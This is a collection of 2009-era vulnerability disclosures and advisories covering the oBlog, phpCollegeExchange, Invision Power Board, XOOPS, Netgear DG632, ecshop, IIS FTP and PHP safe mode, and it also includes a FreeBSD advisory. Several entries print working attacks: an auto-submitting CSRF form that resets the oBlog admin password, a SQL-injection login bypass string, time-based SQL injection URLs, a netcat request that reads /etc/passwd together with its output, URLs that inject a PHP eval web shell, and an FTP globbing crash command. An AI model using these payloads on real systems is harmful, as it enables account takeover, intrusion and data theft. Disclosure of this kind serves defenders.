[-------------------------------------------------------------------------------------------------]
[ Application: oBlog ]
[ Version: the only one there is 
]
[ Download: http://www.dootzky.com/images/projects/oBlog.zip ]
[ Author of this full disclosure: Milos Zivanovic ]
[ Vulnerabilities: Persistant XSS, CSRF, Admin Bruteforce... ]
[-------------------------------------------------------------------------------------------------]
Author of the application is contacted and author of this paper is not responsible for anything
you do after reading this text.
[#] Content:
|–Persistant XSS
| |
| |–Vulnerable function
| |–XSS in article comments
| |–XSS in add new article / Edit article, Naslov field (admin only)
| |–XSS in add new group (category) / Edit group, Naslov field (admin only)
| |–XSS in add link (blogroll) / Edit link, Ime prijatelja, Link fields (admin only)
| |–XSS in settings (admin only)
| |–NOTE!
|
|–Cross Site Request Forgery
| |
| |–Enable/Disable post
| |–Enable/Disable category
| |–Remove link
| |–Logout admin
| |–Change admin password
| |–Change admin settings (name, lastname, PASSWORD, blog title, blog slogan, text about author)
| |–Exploit
|
|–Admin Bruteforce
|
|–Blog Spaming with empty/junk comments
|
|–Conclusion
[#] Full Disclosure:
-[================================================================================================]
-[+]Persistant XSS:
-[================================================================================================]
Function used in this application for filtering input against different types of attacks is not
written good and does not escape html characters.
Vulnerable code:
/oBlog/php/functions.php line 66-94 (function protectInput)
[code---------------------------------------------------------------------------------------------]
// protect invalind input
function protectInput($data, $type)
{
if ($type == 'int') {
if ((!is_numeric($data)) || ($data < 0)) $data = -1;
}
elseif ($type == 'double') {
if ((!is_numeric($data)) || ($data < 0)) $data = -1;
}
elseif ($type == 'doubleLOOSE') {
if (!is_numeric($data)) $data = -1; // jer cu nekada hteti da dozvolim i negativni broj, npr: ODBICI = -50 eura
}
elseif ($type == 'str') {
// minimum length
if (strlen($data) == 0) $data = '--';
// add slashes if needed
$data = (!get_magic_quotes_gpc()) ? addslashes ($data) : $data;
}
elseif ($type == 'date') {
// otpakuj datum, i pripremi ga za ubacivanje u bazu (YYYY-MM-DD)
$tmp = explode('.', $data);
$data = $tmp[2] .'-'. $tmp[1] .'-'. $tmp[0];
}
else {
die('wrong data type?! functions.php -> protectInput();');
}
return $data;
}
[code---------------------------------------------------------------------------------------------]
As we can see there's no function that deals with escaping html characters thus enableing us to
insert malicious javascript code.
[-]XSS in article comments:
http://localhost/oBlog/article.php?aid=[ARTICLE ID]
When adding comment to blog post, we can insert javascript code into certain fields and it will not
be filtered, and pure javascript code will show one the page. Vulnerable fields: Ime, Komentar
/oBlog/article.php line 44-49 (function saveNewComment)
[code---------------------------------------------------------------------------------------------]
// get data
$commentName = protectInput($_POST['commentName'], 'str');
$commentEmail = protectInput($_POST['commentEmail'], 'str');
$commentWeb = protectInput($_POST['commentWeb'], 'str');
$commentText = protectInput($_POST['commentText'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add new article / Edit article, Naslov field (admin only):
Add: http://localhost/oBlog/admin/write.php?new=entry
Edit: http://localhost/oBlog/admin/write.php?edit=[ARTICLE ID]
When creating new post (or edit) in admin panel, person can inject malicious javascript code into
field: Naslov and it will not be filtered, as it is using same protectInput function.
/oBlog/admin/write.php line 136-138 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
$article_id = protectInput($_POST['article_id'], 'int');
$title = protectInput($_POST['title'], 'str');
[code---------------------------------------------------------------------------------------------]
The title of the post is showed in main page of the blog, as in the main page of the admin panel
so this could be used for hidden and more important dangerous permanent javascript.I've used this
javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add new group (category) / Edit group, Naslov field (admin only):
Add: http://localhost/oBlog/admin/groups.php?new=entry
Edit: http://localhost/oBlog/admin/groups.php?edit=[ARTICLE ID]
When creating new group or category(or editing), we can insert malicious javascript code into
field: Ime Grupe and it will not be filtered, this script also uses protectInput function.
/oBlog/admin/groups.php line 79-81 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
$category_id = protectInput($_POST['category_id'], 'int');
$category_name = protectInput($_POST['category_name'], 'str');
[code---------------------------------------------------------------------------------------------]
Title of groups is showed in main page of the blog and in the Groups page in the admin panel.
I've used this javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add link (blogroll) / Edit link, Ime prijatelja, Link fields (admin only):
Add: http://localhost/oBlog/admin/blogroll.php?new=entry
Edit: http://localhost/oBlog/admin/blogroll.php?edit=[BLOGROLL ID]
When adding new link (or editing) we can insert malicious javascript code into fields: Ime
Prijatelja and Link. Field Ime Prijatelja is showed in the main page of the blog and in the
blogroll.php page of the admin panel, and field Link is exploitable only in admin panel
(blogpoll.php).
/oBlog/admin/blogroll.php line 67-69 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
$blogroll_id = protectInput($_POST['blogroll_id'], 'int');
$tile = protectInput($_POST['title'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in settings (admin only):
http://localhost/oBlog/admin/settings.php
There we can edit fields Ime bloga and Moj slogan and put javascript which will be printed in every
page of our blog (not admin panel) and that is certainly not good.
/oBlog/admin/settings.php line 20-22
[code---------------------------------------------------------------------------------------------]
// settings
$data['blog_name'] = protectInput($_POST['blog_name'], 'str');
$data['tag_line'] = protectInput($_POST['tag_line'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]NOTE!
I didn't think about this at the begining of the search for the exploits mission, but i've just
realised that all of the 'admin only' XSS's i found can be injected via CSRF method.
-[================================================================================================]
-[+]Cross Site Request Forgery:
-[================================================================================================]
Author of this blogging system is not introduced with csrf vulnerability, so there were no tokens
or other security mesures used to secure this application against this type of attack.
[-]Enable/Disable post:
We can inject this link below into some <iframe> and with admin visiting the link it will disable
showing of certain article (depending on article id)
[POC---DISABLE------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?publish=[ARTICLE ID]&action=0
[POC----------------------------------------------------------------------------------------------]
[POC---ENABLE-------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?publish=[ARTICLE ID]&action=1
[POC----------------------------------------------------------------------------------------------]
[-]Enable/Disable category:
Another disable csrf. With this by opening this one admin will secretly disable showing all posts
from certain category (depending on category id)
[POC----DISABLE-----------------------------------------------------------------------------------]
http://localhost/oBlog/admin/groups.php?visible=[CATEGORY ID]&action=0
[POC----------------------------------------------------------------------------------------------]
[POC----ENABLE------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/groups.php?visible=[CATEGORY ID]&action=1
[POC----------------------------------------------------------------------------------------------]
[-]Remove link:
With this csrf we can remove any or all links from the blogging system:
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/blogroll.php?delete=[LINK ID]
[POC----------------------------------------------------------------------------------------------]
[-]Logout admin:
With this csrf we can logout admin without his knowledge:
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?logout=user
[POC----------------------------------------------------------------------------------------------]
[*]Change admin password:
This is one of the most critical vulnerabilities i found in this application. Since there is no
CSRF protection, we can change admin's password. Here's the sweet data we need to send via POST
method for this to work:
[INFO---------------------------------------------------------------------------------------------]
submit = 1 // set it to any value, just set it
password1 = "hacked"
password2 = "hacked"
[INFO---------------------------------------------------------------------------------------------]
And send it to /oBlog/admin/settings.php script via POST method. That will change password for the
admin with default username 'admin' (you can't change that in admin panel or anywhere else).
[*]Change admin settings (name, lastname, PASSWORD, blog title, blog slogan, text about author)
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/oBlog/admin/settings.php" method="POST">
<input type="text" name="name" value="exploit">
<input type="text" name="surname" value="for oBlog">
<input type="text" name="nice_name" value="exploit for oBlog">
<input type="text" name="blog_name" value="Exploited blog">
<input type="text" name="tag_line" value="Free your mind and the ass will follow">
<input type="password1" name="password1" value="hacked">
<input type="password2" name="password2" value="hacked">
<select name="posts_per_page">
<option label="15" value="15" selected="selected">15</option>
</select>
<select name="theme">
<option value="pedja" selected>pedja</option>
</select>
<textarea name="about">I have been hacked</textarea>
<input type="submit" value="Snimi promene" name="submit" id="submitButton">
</form>
<script>document.forms[0].submit.click();</script>
[EXPLOIT------------------------------------------------------------------------------------------]
We can edit the fields and put the desired stuff in them. Since i've showed that some other parts
of the oBlog blogging system are vulnerable to persistant xss, we could use this to insert hidden
<iframe> with malicious content in the name of the blog. If you don't want to edit admin's password
remove value="hacked" from 2 lines above you find this in.
-[================================================================================================]
-[+]Admin Bruteforce
-[================================================================================================]
On the admin panel login script /oBlog/admin/index.php there is no security mesure against
bruteforce. A program could be made that would bruteforce the script and, depending on password
complexity, sooner or later, find the login info. Captcha system would come in handy to fix this
vulnerability.
-[================================================================================================]
-[+]Blog Spaming with empty/junk comments
-[================================================================================================]
When adding comments to posts there is no security mesure against bots (no captcha) and on top of
that script doesn't test the input if it's empty, using function protectInput from functions.php
that i posted in the begining of this text it only converts empty fields into '--'. So we can use
one link to generate junk comments.
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/article.php?aid=[ARTICLE ID]&comment=new
[POC----------------------------------------------------------------------------------------------]
-[================================================================================================]
-[+]Conclusion
-[================================================================================================]
oBlog web application is very small (less then 3 mb) and simple. Even tho it's small and simple
it is full of security holes, and as we all know security is something that should come in first
place and it should be our main goal to achive when coding web applications.
[-------------------------------------------------------------------------------------------------]
[ EOF ]
[-------------------------------------------------------------------------------------------------]
Name phpCollegeExchange
Vendor http://phpcollegeex.sourceforge.net
Versions Affected 0.1.5c
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2009-12-11
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
VI. DISCLOSURE TIMELINE
I. ABOUT THE APPLICATION
PhpCollegeExchange is a full fledged college community
website.
II. DESCRIPTION
This application is affected by many SQL Injection
security flaws. In order to exploit they, the Magic Quotes
GPG (php.ini) must be Off.
In this security advisory I reported only some of the
vulnerable files.
I tested 0.1.5c version only, however other versions may
be also vulnerable.
III. ANALYSIS
Summary:
A) Authentication Bypass
B) Multiple SQL Injection
A) Authentication Bypass
Using a SQL Injection in the login process, a guest can
bypass the authentication.
In order to exploit it, The Magic Quotes GPG flag must be
Off.
Vulnerable code (functions.php):
……..
function checkpass($handle,$pass){
require_once($home."mysqlinfo.php");
include("i_aeskey.php");
$query="SELECT AES_DECRYPT(password,’$AES_key’) FROM users WHERE
(handle=’$handle’)";
$result = mysql_query($query);
if(mysql_num_rows($result))
{
if($r = mysql_fetch_array($result))
{$dbpass=$r[0];}
if($pass==$dbpass)
{return 1;}
……..
B) Multiple SQL Injection
Searchend.php is affected by multiple SQL injection issues
that allow a guest to view reserved information stored
into the database.
The following is an example of vulnerable code found in
searchend.php.
Vulnerable code (searchend.php):
……..
$query = "SELECT * FROM Books";
if(isset($_POST['searchby'])){$searchby=$_POST['searchby'];}else{$searchby=$_GET['searchby'];}
switch($searchby){
……..
case "Title" :
$title = $_POST['searchquery'];
if(strlen($title)>2){
//check length at least 3 chars
$query .= " WHERE (title LIKE ‘%$title%’) ORDER BY price";
$result = mysql_query($query);
……..
Another funny SQL injection may be seen in forgotpass.php.
It can be manipulate to send to an arbitrary email address
the password of a registered user, knowing the AES key.
Vulnerable code:
……..
if( isset($_POST["handle"]) ){
……..
$query="SELECT AES_DECRYPT(password,’$AES_key’), email FROM users
WHERE (handle=’$handle’)";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
$email = $r[1];
$pass = $r[0];
……..
mail("$email", "Your Book Exchange Password", $emailcontent);
……..
IV. SAMPLE CODE
A) Authentication Bypass
Username: -1′) UNION ALL SELECT ‘foo’#
Password: foo
B) Multiple SQL Injection
A proof of concept can be found here:
http://poc.salvatorefresta.net/PoC-phpCollegeExchange.txt
V. FIX
No fix.
VIII. DISCLOSURE TIMELINE
2009-12-11 Bug discovered
2009-12-11 Initial vendor contact
2009-12-11 Advisory Release
Version:
Invision Power Services Invision Power Board 2.3.6
Invision Power Services Invision Power Board 3.0.4
Description:
The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Test
http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&s
tarter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20–%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd
http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR
%20substr(version(),1,1)=5%20AND%20sleep(16)%20–%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
========================================================================
=====
FreeBSD-SA-09:17.freebsd-update Security Advisory
The FreeBSD Project
Topic: Inappropriate directory permissions in freebsd-update(8)
Category: core
Module: usr.sbin
Announced: 2009-12-03
Credits: KAMADA Ken’ichi
Affects: All supported versions of FreeBSD.
Corrected: 2009-12-03 09:18:40 UTC (RELENG_8, 8.0-STABLE)
2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)
2009-12-03 09:18:40 UTC (RELENG_7, 7.2-STABLE)
2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)
2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)
2009-12-03 09:18:40 UTC (RELENG_6, 6.4-STABLE)
2009-12-03 09:18:40 UTC (RELENG_6_4, 6.4-RELEASE-p8)
2009-12-03 09:18:40 UTC (RELENG_6_3, 6.3-RELEASE-p14)
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.
I. Background
The freebsd-update(8) utility is used to fetch, install, and rollback
updates to the FreeBSD base system, and also to upgrade from one FreeBSD
release to another.
II. Problem Description
When downloading updates to FreeBSD via ‘freebsd-update fetch’ or
‘freebsd-update upgrade’, the freebsd-update(8) utility copies currently
installed files into its working directory (/var/db/freebsd-update by
default) both for the purpose of merging changes to configuration files
and in order to be able to roll back installed updates.
The default working directory used by freebsd-update(8) is normally
created during the installation of FreeBSD with permissions which allow
all local users to see its contents, and freebsd-update(8) does not take
any steps to restrict access to files stored in said directory.
III. Impact
A local user can read files which have been updated by freebsd-update(8),
even if those files have permissions which would normally not allow users
to read them. In particular, on systems which have been upgraded using
‘freebsd-update upgrade’, local users can read freebsd-update’s backed-up
copy of the master password file.
IV. Workaround
Set the permissions on the freebsd-update(8) working directory to not
allow unprivileged users to read said directory:
# chmod 0700 /var/db/freebsd-update
Note that if freebsd-update(8) is run using the ‘-d workdir’ option, the
directory which should have its permissions adjusted will be different.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 6-STABLE, 7-STABLE or 8-STABLE,
or to the RELENG_8_0, RELENG_7_2, RELENG_7_1, RELENG_6_4, or
RELENG_6_3 security branch dated after the correction date.
2) To patch your present system:
The following patch has been verified to apply to FreeBSD 6.3, 6.4,
7.1, 7.2, and 8.0 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch http://security.FreeBSD.org/patches/SA-09:17/freebsd-update.patch
# fetch http://security.FreeBSD.org/patches/SA-09:17/freebsd-update.patch.asc
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.sbin/freebsd-update
# make obj && make depend && make && make install
# chmod 0700 /var/db/freebsd-update
VI. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
CVS:
Branch Revision
Path
- ————————————————————————
-
RELENG_6
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.11
src/etc/mtree/BSD.var.dist 1.71.2.4
RELENG_6_4
src/UPDATING 1.416.2.40.2.12
src/sys/conf/newvers.sh 1.69.2.18.2.14
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.10.2.2
src/etc/mtree/BSD.var.dist 1.71.2.3.6.2
RELENG_6_3
src/UPDATING 1.416.2.37.2.19
src/sys/conf/newvers.sh 1.69.2.15.2.18
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.8.2.1
src/etc/mtree/BSD.var.dist 1.71.2.3.4.1
RELENG_7
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.5
src/etc/mtree/BSD.var.dist 1.75.2.1
RELENG_7_2
src/UPDATING 1.507.2.23.2.8
src/sys/conf/newvers.sh 1.72.2.11.2.9
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.4.4.2
src/etc/mtree/BSD.var.dist 1.75.8.2
RELENG_7_1
src/UPDATING 1.507.2.13.2.12
src/sys/conf/newvers.sh 1.72.2.9.2.13
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.4.2.2
src/etc/mtree/BSD.var.dist 1.75.6.2
RELENG_8
src/usr.sbin/freebsd-update/freebsd-update.sh 1.16.2.3
src/etc/mtree/BSD.var.dist 1.75.10.2
RELENG_8_0
src/UPDATING 1.632.2.7.2.4
src/sys/conf/newvers.sh 1.83.2.6.2.4
src/usr.sbin/freebsd-update/freebsd-update.sh 1.16.2.2.2.2
src/etc/mtree/BSD.var.dist 1.75.10.1.2.2
- ————————————————————————
-
Subversion:
Branch/path Revision
- ————————————————————————
-
stable/6/ r200054
releng/6.4/ r200054
releng/6.3/ r200054
stable/7/ r200054
releng/7.2/ r200054
releng/7.1/ r200054
stable/8/ r200054
releng/8.0/ r200054
- ————————————————————————
-
VII. References
The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-09:17.freebsd-update.a
sc
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.10 (FreeBSD)
iEYEARECAAYFAksXhA0ACgkQFdaIBMps37Lg+wCfSK5sMXpsxTW9jpgwwcqx+24z
zzwAniR50V8K8/vI0qshCUaKwryEYDuK
=/lsC
—–END PGP SIGNATURE—–
***** MS IIS FTPD DoS ZER0DAY *****
There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.
Example session where the anonymous user has read access to the folder "pub":
C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
…
p*/../pub:
pub
…
p*/../pub:
pub
…
p*/../pub:
pub
…
p*/../pub:
pub
…
Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed
the connection)
ftp>
ftp>
By looking into my debugging session with OllyDbg I see that an
exception is raised and
the ftp service crashes due to a "stack overflow", what is a stack exhaustion.
If the ftp service is set to "manual" startup in services control
manager the service
needs to be restarted manually.
IIS 5.0 and 6.0 were tested and are affected.
Best Regards,
Nikolaos Rangos
Microsoft Corporation – http://www.microsoft.com/
Affected Software:
Windows XP Service Pack 2
Windows XP Service Pack 3
Affected Driver:
Multi-User Win32 Driver – win32k.sys <= 5.1.2600.5796
Local Privilege Escalation Exploit
For Educational Purposes Only
NT Internals – http://www.ntinternals.org/
alex ntinternals org
30 July 2009
References:
Exploiting Common Flaws in Drivers
Ruben Santamarta – http://www.reversemode.com/
Exploit:
http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip
back: http://milw0rm.com/sploits/2009-NtUserConsoleControl_Exp.zip
Description:
http://www.ntinternals.org/index.html#09_07_30
========================================================================
XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
========================================================================
Affected Software : XOOPS <= 2.3.3
Author : Luca "daath" De Fulgentis – daath[at]nibblesec[dot]org
Advisory number : NS-2009-01
Advisory URL : http://blog.nibblesec.org/advisories/NS-2009-01.txt
Severity : Low/Medium
Local/Remote : Remote
[Summary]
XOOPS is a web application platform written in PHP for the MySQL database.
Its object orientation makes it an ideal tool for developing small or large
community websites, intra company and corporate portals, weblogs and much
more. (Reference : http://www.xoops.org).
Nibble Security discovered a remote arbitrary file retrieval in XOOPS version
2.3.3, which could be exploited to read system or XOOPS configuration files
("mainfile.php").
[Vulnerability Details]
A vulnerable read_file() function can be found in "module_icon.php" under
/xoops_lib/modules/protector/. Here an image icon is read and its full
pathname is constructed using a user-controllable variable called
"$mydirpath" :
=============================================================================
[...]
if( file_exists( $mydirpath.’/module_icon.png’ ) ) {
$use_custom_icon = true ;
$icon_fullpath = $mydirpath.’/module_icon.png’ ;
} else {
$use_custom_icon = false ;
$icon_fullpath = dirname(__FILE__).’/module_icon.png’ ;
}
[...]
} else {
readfile( $icon_fullpath ) ;
}
?>
=============================================================================
If register_globals is enabled and magic_quotes_gpc disabled, it’s possible
to control the "$mydirpath" variable content and inject an arbitrary filename
(followed by a NULL byte (%00) to make file_exists() function ignore the
following "/module_icon.png"), resulting in file content inclusion in
application response.
[Proof of Concept Exploit]
Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the
one generated by the vulnerable script). Bacause of this netcat/telnet can be
easily used to exploit this vulnerability :
daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php?
mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80
HTTP/1.1 200 OK
Date: Mon, 16 Mar 2009 19:07:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.1
Expires: Mon, 16 Mar 2009 21:00:00 +0100
Cache-Control: public, max-age=3600
Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100
Content-Length: 1661
Connection: close
Content-Type: image/png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]
daath@shaytan:~$
[Time Table]
17/03/2009 – Vendor notified.
17/03/2009 – Vendor response.
28/05/2009 – Vendor re-contacted (no answer).
16/06/2009 – Public disclosure.
[Legal Notices]
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on, this information.
Permission is hereby granted for the redistribution of this alert,
provided that the content is not altered in any way, except
reformatting, and that due credit is given.
This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html
# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke
Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk >
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009
I. DESCRIPTION
The Netgear DG632 router has a web interface which runs on port 80.
This allows an admin to login and administer the device’s settings.
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an attacker to access files and data without
authentication.
II. DETAILS
The "webcm" script handles user authentication and attempts to load
"indextop.htm" (via javascript below). The "indextop.htm" page requires
authentication (HTTP Basic Authorization).
—
<script language="javascript" type="text/javascript">
function loadnext() {
//document.forms[0].target.value="top";
document.forms[0].submit();
//top.location.href="../cgi-bin/webcm?nextpage=../html/indextop.htm";
}</script></head>
<body bgcolor="#ffffff" onload="loadnext()" >
Loading file …
<form method="POST" action="../cgi-bin/webcm" id="uiPostForm">
<input type="hidden" name="nextpage" value="../html/indextop.htm" id="uiGetNext">
</form>
—
If a valid password to the default "admin" user is supplied, the script
then continues to load the "indextop.htm" page and continues to load the
other frames based on a hidden field. If user authentication is
unsuccessful, the user is returned back to "../cgi-bin/webcm". It is
possible to bypass the "webcm" script and access specific files directly
without the need for authentication.
Normal use:
http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm
This would ask for the user to authenticate and would refuse access to
this file if authentication details were not known. All the script is
doing is making sure authentication is forced upon the user. The same
"stattbl.htm" file can be accessed without having to provide any
authentication using the following URL:
http://TARGET_IP/html/stattbl.htm
Another example:
http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm
(returns 401 – Forbidden)
Bypassing the "webcm" script:
http://192.168.0.1/html/modemmenu.htm
(returns 200 – OK)
In the example above (modemmenu.htm), the full source can be viewed
which discloses further directories and files within the javascript of
the page. A sample of files disclosed within modemmenu.htm and available
to download are:
/html/onload.htm
/html/form.css
/gateway/commands/saveconfig.html
/html/utility.js (full source)
There are many other files that are accessible by calling them directly
instead of going via the "webcm" script, the above are just a sample. In
addition, it is possible to specify paths to the "webcm" script as shown
below:
http://TARGET_IP/cgi-bin/webcm?nextpage=../../
This allows an attacker to enumerate what files and directories exist
within the www root directory and beyond by using 200, 403 and 404
errors as a guide.
Affected Versions: Firmware V3.4.0_ap (others unknown)
III. VENDOR RESPONSE
12 June, 2009 – Contacted vendor.
15 June, 2009 – Vendor responded. Stated the DG632 is an end of life
product and is no longer supported in a production and development
sense, as such, there will be no further firmware releases to resolve
this issue.
IV. CREDIT
Discovered by Tom Neaves
This is a discussion on “ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities” within the Public part of the Exploits section; Feel free to discuss about this proof-of-concept code Download: exploit…
######################### Securitylab.ir ########################
# Application Info:
# Name: ecshop
# Version: 2.6.2
# Website: http://www.ecshop.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info@securitylab[dot]ir & K4mr4n_st@yahoo.com
#################################################################
#===========================================================
# :: integrate.php ::
#
# if ($_REQUEST['act'] == 'sync')
# {
# $size = 100;
# ......
# $tasks = array();
# if ($task_del > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>');
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
# $del_list = $db->getCol($sql);//$del_list
# }
# if ($task_rename > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');
# $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
# $rename_list = $db->getAll($sql);//$rename_list
# }
# if ($task_ignore >0)
# {
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
# $ignore_list = $db->getCol($sql);//$ignore_list
# }
# ....
# $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
# $log = '';
# if (isset($del_list))
# {
# $log .= '$del_list=' . var_export($del_list,true) . ';';
# }
# if (isset($rename_list))
# {
# $log .= '$rename_list=' . var_export($rename_list, true) . ';';
# }
# if (isset($ignore_list))
# {
# $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
# }
# fwrite($fp, $log);
# fclose($fp);
# $smarty->assign('tasks', $tasks);
# $smarty->assign('ur_here',$_LANG['user_sync']);
# $smarty->assign('size', $size);
# $smarty->display('integrates_sync.htm');
# }
#
#
# http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
Title : PHP <= 5.2.9 SafeMod Bypass Vulnerability (win32)
Affected Version : Tested on 5.2.8, 5.2.6 but previous versions maybe be afftect
Vendor Site : www.php.net
Vulnerability Discoverd by : www.abysssec.com
Description :
Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
the problem comes from OS behavior – implement and interfacing between php
and operation systems directory structure . the problem is php won’t tell difference
between directory browsing in linux and windows this can lead attacker to ability
execute his / her commands on targert machie even in SafeMod On (php.ini setting) .
Vulnerability :
in linux when you want open a directory for example php directory you need
to go to /usr/bin/php and you can’t use \usr\bin\php . but windows won’t tell
diffence between slash and back slash it means there is no didffrence between
c:\php and c:/php , and this is not vulnerability but itself but because of this simple
php implement "\" character can escape safemode using function like excec .
PoC / Exploit :
orginal : www.abysssec.com/safemod-windows.zip
mirror : www.milw0rm.com/sploits/2009-safemod-windows.zip
note : this vulnerabities is just for educational purpose and showing vulnerability exist
so author will be not be responsible for any damage using this vulnerabilty.
for more information visit Abysssec.com
feel free to contact me at admin [at] abysssec.com
